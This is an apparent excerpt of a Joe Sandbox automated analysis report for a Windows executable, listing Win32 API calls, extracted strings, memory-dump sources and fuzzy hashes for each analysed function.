                                                            • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                            • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                            • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                            APIs
                                                            • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                            • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                            • GetWindowDC.USER32(?), ref: 0044A0F6
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                            • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                            • GetSysColor.USER32(0000000F), ref: 0044A131
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                            • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                            • GetSysColor.USER32(00000005), ref: 0044A15B
                                                            • GetWindowDC.USER32(?), ref: 0044A1BE
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                            • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                            • GetSysColor.USER32(00000008), ref: 0044A265
                                                            • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                            • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                            • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                            • String ID:
                                                            • API String ID: 1744303182-0
                                                            • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                            • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                            • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                            • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                            • __mtterm.LIBCMT ref: 00417C34
                                                              • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                              • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                            • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                            • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                            • __init_pointers.LIBCMT ref: 00417CE6
                                                            • __calloc_crt.LIBCMT ref: 00417D54
                                                            • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                            • API String ID: 4163708885-3819984048
                                                            • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                            • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                            • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                            • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: __wcsicoll$IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2485277191-404129466
                                                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                            APIs
                                                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                            • SetWindowTextW.USER32(?,?), ref: 00454678
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                            • GetWindowRect.USER32(?,?), ref: 004546F5
                                                            • SetWindowTextW.USER32(?,?), ref: 00454765
                                                            • GetDesktopWindow.USER32 ref: 0045476F
                                                            • GetWindowRect.USER32(00000000), ref: 00454776
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                            • GetClientRect.USER32(?,?), ref: 004547D2
                                                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00464B28
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                            • _wcslen.LIBCMT ref: 00464C28
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                            • _wcslen.LIBCMT ref: 00464CBA
                                                            • _wcslen.LIBCMT ref: 00464CD0
                                                            • _wcslen.LIBCMT ref: 00464CEF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: _wcslen$Directory$CurrentSystem
                                                            • String ID: D
                                                            • API String ID: 1914653954-2746444292
                                                            • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                            • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                            APIs
                                                            • _wcsncpy.LIBCMT ref: 0045CE39
                                                            • __wsplitpath.LIBCMT ref: 0045CE78
                                                            • _wcscat.LIBCMT ref: 0045CE8B
                                                            • _wcscat.LIBCMT ref: 0045CE9E
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                            • _wcscpy.LIBCMT ref: 0045CF61
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                            • String ID: *.*
                                                            • API String ID: 1153243558-438819550
                                                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: __wcsicoll
                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                            • API String ID: 3832890014-4202584635
                                                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                            APIs
                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                            • GetFocus.USER32 ref: 0046A0DD
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$CtrlFocus
                                                            • String ID: 0
                                                            • API String ID: 1534620443-4108050209
                                                            • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                            • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004558E3
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$CreateDestroy
                                                            • String ID: ,$tooltips_class32
                                                            • API String ID: 1109047481-3856767331
                                                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                            • GetMenuItemCount.USER32(?), ref: 00468C45
                                                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                            • GetMenuItemCount.USER32 ref: 00468CFD
                                                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                            • GetCursorPos.USER32(?), ref: 00468D3F
                                                            • SetForegroundWindow.USER32(?), ref: 00468D49
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                            • String ID: 0
                                                            • API String ID: 1441871840-4108050209
                                                            • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                            • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                            • __swprintf.LIBCMT ref: 00460915
                                                            • __swprintf.LIBCMT ref: 0046092D
                                                            • _wprintf.LIBCMT ref: 004609E1
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                            Strings
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 3631882475-2268648507
                                                            • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                            • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                            • SendMessageW.USER32 ref: 00471740
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                            • SendMessageW.USER32 ref: 0047184F
                                                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                            Similarity
                                                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                            • String ID:
                                                            • API String ID: 4116747274-0
                                                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                            • _wcslen.LIBCMT ref: 00461683
                                                            • __swprintf.LIBCMT ref: 00461721
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                            • GetDlgCtrlID.USER32(?), ref: 00461869
                                                            • GetWindowRect.USER32(?,?), ref: 004618A4
                                                            • GetParent.USER32(?), ref: 004618C3
                                                            • ScreenToClient.USER32(00000000), ref: 004618CA
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                            Strings
                                                            Similarity
                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                            • String ID: %s%u
                                                            • API String ID: 1899580136-679674701
                                                            • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                            • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                            • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                            • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                            Strings
                                                            Similarity
                                                            • API ID: InfoItemMenu$Sleep
                                                            • String ID: 0
                                                            • API String ID: 1196289194-4108050209
                                                            • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                            • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0043143E
                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                            • SelectObject.GDI32(00000000,?), ref: 00431466
                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                            Strings
                                                            Similarity
                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                            • String ID: (
                                                            • API String ID: 3300687185-3887548279
                                                            • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                            • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                            APIs
                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            Strings
                                                            Similarity
                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1976180769-4113822522
                                                            • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                            APIs
                                                            Similarity
                                                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                            • String ID:
                                                            • API String ID: 461458858-0
                                                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                            • DeleteObject.GDI32(?), ref: 004301D0
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                            Similarity
                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3969911579-0
                                                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                            • String ID: 0
                                                            • API String ID: 956284711-4108050209
                                                            • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                            • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                            • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 1965227024-3771769585
                                                            • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                            • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                            • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                            Strings
                                                            Similarity
                                                            • API ID: SendString$_memmove_wcslen
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 369157077-1007645807
                                                            • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                            • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                            • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                            APIs
                                                            • GetParent.USER32 ref: 00445BF8
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                            • __wcsicoll.LIBCMT ref: 00445C33
                                                            • __wcsicoll.LIBCMT ref: 00445C4F
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
